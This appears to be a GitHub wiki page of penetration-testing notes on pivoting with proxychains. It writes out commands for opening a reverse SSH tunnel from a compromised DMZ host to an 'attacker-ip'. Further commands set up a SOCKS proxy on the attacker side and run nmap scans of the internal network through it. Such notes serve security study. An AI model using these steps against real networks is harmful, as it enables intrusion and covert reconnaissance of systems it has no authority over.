-
Notifications
You must be signed in to change notification settings - Fork 14
Proxychains
lethanhtung01011980 edited this page Dec 23, 2019
·
13 revisions
- To complement the dynamic port forwarding
- To run any network tool through HTTP, SOCKS4, and SOCKS5 proxies.
- Attacker traffics ====> port 8080 of attacker =====> SSH reverse shell =======> auto-select port in victim PC (based on application protocol).
To check for listening port
netstat -lntp
In victim DMZ PC, to create reverse SSH tunnel from compromised DMZ PC (port 22) to attacker PC (port 2222)
ssh -f -N root@attacker-ip -R 2222:127.0.0.1:22
- Port 2222 is listening port in attacker
- -f: To run in background
- -N: Do not execute remote command. For port forwarding.
- -R: Reverse
In attacker PC, to create dynamic port forwarding from port 8080 to SSH tunnel at port 2222
ssh -f -N -D 127.0.0.1:8080 -p 2222 victim-DMZ-user@127.0.0.1
In attacker PC, to use proxychains to connect to all DMZ network
proxychains nmap --top-ports=20 -sT -Pn 172.16.40.0/24
- proxychain will listen to port 8080
- SSH tunnel acts as a SOCKS server.
- 172.16.40.0/24 is sample DMZ network